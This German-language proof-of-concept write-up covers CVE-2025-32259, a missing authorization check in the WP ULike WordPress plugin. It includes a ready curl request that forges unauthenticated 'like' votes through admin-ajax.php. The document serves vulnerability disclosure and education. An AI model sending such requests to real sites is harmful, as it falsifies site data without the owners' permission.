
In betroffenen Versionen des WP ULike-Plugins fehlt eine ordnungsgemäße Autorisierungsprüfung, bevor bestimmte AJAX-Aktionen oder Abstimmungsmanipulationen zugelassen werden. Dadurch können nicht authentifizierte Benutzer auf das Plugin in einer Weise zugreifen, die nur angemeldeten Benutzern möglich sein sollte – was potenziell Abstimmungen verfälscht oder irreführende Daten einschleust.
🔬 Ein einfacher PoC, der CVE-2025-32259 im WP ULike-Plugin für WordPress demonstriert.
🚨 Nur für Bildungszwecke – nicht auf Systemen ohne ausdrückliche Genehmigung testen.
WP ULike ist ein beliebtes WordPress-Plugin, mit dem Benutzer Inhalte auf einer Website liken können. Versionen bis einschließlich 4.7.9.1 weisen eine fehlende Autorisierungsschwachstelle auf, die es nicht authentifizierten Benutzern ermöglicht, „Like“-Aktionen über AJAX-Anfragen zu fälschen.
Die Schwachstelle ermöglicht es nicht authentifizierten Benutzern, mit dem AJAX-Endpunkt zu interagieren und beliebige Inhalte (Beiträge, Kommentare usw.) ohne Berechtigung zu liken.
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
-d "action=wp_ulike_process" \
-d "method=likeThis" \
-d "id=1" \
-d "type=post" \
-d "nonce=" \
-H "Content-Type: application/x-www-form-urlencoded"
Ersetzen Sie id=1 durch eine gültige Beitrags-ID.
Eine erfolgreiche Antwort könnte wie folgt aussehen:
{"status":"success","msg":"You liked this."}